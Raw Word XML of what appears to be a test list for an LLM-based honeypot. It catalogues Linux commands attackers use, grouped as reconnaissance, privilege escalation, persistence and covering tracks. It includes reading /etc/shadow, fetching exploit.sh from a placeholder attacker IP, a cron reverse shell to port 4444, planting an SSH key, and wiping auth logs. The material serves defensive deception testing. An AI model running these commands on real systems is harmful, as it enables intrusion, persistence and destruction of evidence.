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B0A1" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:r w:rsidRPr="00177FD5">
        <w:t>1. Reconnaissance and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC9C95C" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:r w:rsidRPr="00177FD5">
        <w:t>These commands are used by attackers to gather information about the system, its users, running processes, and network configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243EA318" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> -a: Displays detailed system and kernel information. Attackers use this to identify the OS version and architecture to find suitable exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12038CF0" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>: Shows the current user's username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D429606" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>id: Provides user and group identity information. It's a quick way to check privilege levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E823EEA" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>/passwd: Lists all local user accounts on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B495F0" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>/shadow: Attempts to read the file containing hashed user passwords. The LLM's response to a permission-denied error here is a key test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8E6A3" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>-release: Shows operating system identification data, which is crucial for version-specific attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E4DBDF" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> aux: Lists all running processes. Attackers look for misconfigured services, sensitive information in process arguments, or processes running with high privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3DFFE" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>antup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> or ss -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>antup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>: Displays all active network connections and listening ports. This helps attackers map the system's network services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944CEEB" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> a: Shows network interface configuration, including IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC2D753" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> -l: Checks the current user's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> privileges to see which commands can be run as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB6FB6" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>history: Displays the command history for the current user, potentially revealing passwords, scripts, or sensitive paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED84AC" w14:textId="747CFC7C" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:r w:rsidRPr="00177FD5">
        <w:t>2. Privilege Escalation and Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E077D0F" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:r w:rsidRPr="00177FD5">
        <w:t>Once an attacker has basic information, they will try to gain higher privileges, often aiming for root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40557DFB" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>find / -perm -u=s -type f 2&gt;/dev/null: Searches the entire filesystem for SUID (Set User ID) files. These binaries run with the owner's permissions (often root) and are a classic vector for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACED9F4" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:lastRenderedPageBreak/>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>: Attempts to switch to the root user. The LLM must realistically handle the password prompt and subsequent success or failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C4253" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> http://&lt;attacker-ip&gt;/exploit.sh: Uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> to download a malicious script or tool from an external server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD95E72" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve">curl -o exploit.sh http://&lt;attacker-ip&gt;/exploit.sh: An alternative to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> for downloading files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08EB4B" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> +x exploit.sh: Makes a downloaded script executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E9723" w14:textId="72FCFA7C" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>./exploit.sh: Executes the script. The LLM's ability to generate a plausible, multi-line output from a fake script is a critical test of its deception capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998FC52" w14:textId="3B9319A3" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:r w:rsidRPr="00177FD5">
        <w:t>3. Persistence and Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D14B120" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:r w:rsidRPr="00177FD5">
        <w:t>After gaining access, attackers will try to ensure they can return later and potentially move to other systems on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDC0293" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve">crontab -l: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>Lists</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> the scheduled tasks (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> jobs) for the current user. Attackers often modify these for persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B9540" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>echo '0 * * * * /bin/bash -c "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>/&lt;attacker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve">&gt;/4444 0&gt;&amp;1"' | crontab -: Attempts to add a malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> job to establish a reverse shell every hour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079758B" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>echo "ssh-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> AAAA..." &gt;&gt; ~/.ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve">: Tries to add an attacker's SSH public key to the user's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> file for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>passwordless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve"> access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7980A396" w14:textId="20CA87AF" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>user@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>&lt;internal-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>&gt;: Attempts to move laterally to another machine on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710B0CB" w14:textId="586FCDEA" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:r w:rsidRPr="00177FD5">
        <w:t>4. Evasion and Covering Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B4CF7" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:r w:rsidRPr="00177FD5">
        <w:t>Finally, attackers may try to hide their presence and remove evidence of their actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A464D0" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>history -c: Clears the command history for the current terminal session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC6B89" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>unset HISTFILE: Attempts to disable command history logging for the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7636CB" w14:textId="77777777" w:rsidR="002D109D" w:rsidRPr="00177FD5" w:rsidRDefault="002D109D" w:rsidP="002D109D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00177FD5">
        <w:t>rm -f /var/log/auth.log or cat /dev/null &gt; /var/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>wtmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00177FD5">
        <w:t>: Tries to delete or empty log files to erase activity records. This should almost always generate a "permission denied" error for a non-root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE8E1E9" w14:textId="77777777" w:rsidR="00B00C5A" w:rsidRPr="00177FD5" w:rsidRDefault="00B00C5A"/>
    <w:sectPr w:rsidR="00B00C5A" w:rsidRPr="00177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0EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C96C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C6164"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1EA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6501D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52FE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02D91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="790E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416417">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1042828003">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1938515276">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1115293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9D"/>
    <w:rsid w:val="00113479"/>
    <w:rsid w:val="00177FD5"/>
    <w:rsid w:val="002D109D"/>
    <w:rsid w:val="003C65C1"/>
    <w:rsid w:val="004223D1"/>
    <w:rsid w:val="006D3016"/>
    <w:rsid w:val="00B00C5A"/>
    <w:rsid w:val="00FF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3C364"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DF487431-9595-4AD1-89D5-082AECA3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Godburn</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Godburn, Ryan M</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-12T14:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T14:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>